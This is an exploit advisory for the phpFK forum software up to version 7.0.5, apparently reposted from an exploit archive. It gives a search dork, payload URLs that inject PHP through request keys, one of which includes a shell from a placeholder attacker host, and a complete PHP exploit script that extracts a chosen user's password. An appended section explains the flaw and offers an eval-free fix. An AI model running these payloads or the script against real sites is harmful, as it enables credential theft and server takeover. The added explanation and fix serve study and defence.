phpFK <= v7.0.5 Remote Code Execution
Posted on 22 June 2010
===================================== phpFK <= v7.0.5 Remote Code Execution =====================================

+-------------------------------------------------------------------------------------------------------------------------------+
| Name:          phpFK <= v7.0.5 RCE
| Software:      phpFK <= v7.0.5
| Site:          http://frank-karau.de/
| Download:      http://frank-karau.de/download/phpfk_php_forum_7.05.zip
| Vulnerability: Remote Code Execution
| Severity:      medium ( low / medium / high )
| Tested on:     v7.0.5
| Dork:          "© phpFK"
| Requires:      register_globals = On
+-------------------------------------------------------------------------------------------------------------------------------+
| Author:   Lord-Anubis
| Contact:  lord.anu bis4[at]gm ail[dot]com
| Date:     21.06.2010 ( dd.mm.yyyy )
| Site:     http://lordanubis.altervista.org/
| Defaces:  http://www.zone-h.org/archive/notifier=Lord-Anubis
| Exploits: http://inj3ct0r.com/author/2486
+-------------------------------------------------------------------------------------------------------------------------------+
| Bug File: include/init.php (lines 25-35)
|
|   if (ini_get('register_globals'))
|   {
|       foreach($_GET as $s_name => $s_value)
|       {
|           eval('$'.$s_name.' = \'\';');
|       }
|       foreach($_POST as $s_name => $s_value)
|       {
|           eval('$'.$s_name.' = \'\';');
|       }
|   }
+-------------------------------------------------------------------------------------------------------------------------------+
| Bug Explanation:
|
|   include/init.php tries to neutralise register_globals: when the option is on, it loops over every GET and POST
|   key and, through eval(), overwrites the variable of that name with an empty string so that the auto-registered
|   variables are unusable. The key is concatenated into the eval()'d statement ("$<key> = '';") without any
|   check, so a request key that contains PHP code is executed as PHP. It is enough to put the code in the key
|   (not the value) of a GET or POST parameter.
|
|   Two details of the payload matter. PHP rewrites '.' (and ' ') in request keys to '_' when it builds $_GET and
|   $_POST, so a literal dot cannot survive in the variable name; the payload therefore writes the path with
|   underscores and rebuilds the dots on the target with str_replace('_', chr(46), ...). For the same reason a
|   target user name that itself contains '_' is mangled. The trailing '?>' leaves PHP mode, so the " = '';" that
|   init.php appends is emitted as literal text instead of being parsed.
|
|   Examples:
|   1) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'data/user/[nickAdmin].usr.ini'))?>
|   2) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'http://www.evil.com/shell.txt'))?>
|
|   Example 1 require()s the target user's data/user/<nick>.usr.ini; a file with no PHP tags is echoed into the
|   response verbatim, which is how exploit.php below reads the password= value out of it. Example 2 pulls the
|   code from a remote host and additionally needs allow_url_include (allow_url_fopen on PHP older than 5.2) to be
|   enabled on the target.
|
|   - PL: ...
+-------------------------------------------------------------------------------------------------------------------------------+
| Exploit:
+-------------------------------------------------------------------------------------------------------------------------------+

<?php
/**
 * exploit.php
 *
 * Software:      phpFK <= v7.0.5
 * Author:        Lord-Anubis <lord.anu bis4[at]gm ail[dot]com>
 * Vulnerability: Remote Code Execution
 */

error_reporting(0);
ini_set("max_execution_time", 0);

// GET key carrying the code. Quotes and '>' are URL-encoded; the dots in the
// path are written as-is because PHP on the target turns them into '_' anyway
// and str_replace('_', chr(46), ...) rebuilds them inside the eval()'d code.
function codeExec()
{
    global $userName;
    return "a;require(str_replace(%27_%27,chr(46),%27data/user/{$userName}.usr.ini%27))?%3E";
}

// argv holds the script name plus hostName, path and userName
if ($argc != 4) {
    exit(
        "[+] Software: phpFK <= v7.0.5\n" .
        "[+] Author: Lord-Anubis\n" .
        "[+] Vulnerability: Remote Code Execution\n" .
        "[+] Usage: ./exploit [hostName] [path] [evilUserName]\n" .
        "[+] Example:\n" .
        "[+] ./exploit 127.0.0.1 / admin\n" .
        "[+] ./exploit hostname.com /phpFK/ moderator\n"
    );
}

list($cli, $hostName, $path, $userName) = $argv;

// require() of a file with no PHP tags echoes it into the response, so the
// target user's .usr.ini comes back in the page body and the password= field
// can be picked out of it.
if (!preg_match('/password=([a-zA-Z0-9]+)/is',
                file_get_contents("http://{$hostName}{$path}index.php?" . codeExec()),
                $return)) {
    exit("[-] Exploit failed\n");
}

echo("[+] Password: {$return[1]}\n");
echo("[+] Exploit successful\n");
exit;
?>

# Inj3ct0r.com [2010-06-22]
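The following is an added example and is not code from phpFK or from the advisory. It shows, side by side, the string the vulnerable cleanup loop hands to eval() for the advisory's first payload and an eval()-free replacement that undoes register_globals by unsetting array keys instead of interpreting request keys as PHP. It runs from the command line with no web server: the request key, the simulated register_globals state and the function names (mangleRequestKey, vulnerableEvalString, unregisterGlobals) are all assumptions made for the example.

```php
<?php
// Added example, not code from phpFK or from the advisory: the eval()-based
// register_globals cleanup next to an eval()-free replacement, run from the
// command line with constructed request data instead of a real web request.

// PHP rewrites '.' and ' ' in query-string keys to '_' when it builds $_GET
// and $_POST (a '.' cannot appear in a PHP variable name). This models that
// step for a raw key taken from the request line.
function mangleRequestKey(string $key): string
{
    return str_replace(['.', ' '], '_', $key);
}

// The string include/init.php passes to eval() for one request key. It is
// returned rather than executed so it can be printed safely; running it for
// an attacker-supplied key is the bug.
function vulnerableEvalString(string $key): string
{
    return '$' . $key . ' = \'\';';
}

// Eval-free replacement for the cleanup loop. The request key is only ever
// used as an array index, so nothing in it is parsed as PHP. Superglobals are
// skipped so a request cannot make the cleanup unset $_GET, $GLOBALS, etc.
// $sources is passed in (instead of reading $_GET/$_POST directly) so the
// function can be exercised offline; it returns the number of globals removed.
function unregisterGlobals(array $sources): int
{
    $protected = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_FILES',
                  '_SERVER', '_ENV', '_REQUEST', '_SESSION'];
    $removed = 0;
    foreach ($sources as $source) {
        foreach (array_keys($source) as $name) {
            $name = (string) $name;
            if (in_array($name, $protected, true)) {
                continue;
            }
            if (array_key_exists($name, $GLOBALS)) {
                unset($GLOBALS[$name]);
                $removed++;
            }
        }
    }
    return $removed;
}

// --- 1. What the vulnerable line would run for the advisory's first payload ---
// Constructed: the key as it appears in the URL, before PHP's key mangling.
$rawKey = "a;require(str_replace('_',chr(46),'data/user/admin.usr.ini'))?>";
$name   = mangleRequestKey($rawKey);

echo "registered variable name: $name\n";
echo "string handed to eval():  " . vulnerableEvalString($name) . "\n";
// On the target, str_replace() turns the underscores back into dots and the
// '?>' drops PHP back to inline output, so the appended " = '';" is printed
// rather than parsed.

// --- 2. The hardened cleanup, against a constructed register_globals state ---
// Simulate what register_globals=On would have done for ?a=1&GLOBALS=x:
$constructedGet = ['a' => '1', 'GLOBALS' => 'x'];
$GLOBALS['a'] = '1';   // the auto-registered copy of the parameter

$removed = unregisterGlobals([$constructedGet]);
echo "globals removed: $removed\n";
echo "\$a still set: " . (isset($GLOBALS['a']) ? 'yes' : 'no') . "\n";
echo "\$GLOBALS intact: " . (is_array($GLOBALS) ? 'yes' : 'no') . "\n";
```

Run with `php example.php`. The first part prints the variable name PHP registers for the payload (dots replaced by underscores) and the statement `$a;require(str_replace('_',chr(46),'data/user/admin_usr_ini'))?> = '';` that init.php would eval(), which makes visible why the payload needs both the chr(46) substitution and the closing `?>`. The second part removes the auto-registered `$a` but leaves `$GLOBALS` untouched even though a `GLOBALS` key was in the request. In a real init.php the call site would be guarded by `ini_get('register_globals')` and given `[$_GET, $_POST, $_COOKIE, $_FILES, $_SERVER, $_ENV]`, the same sources PHP would have registered.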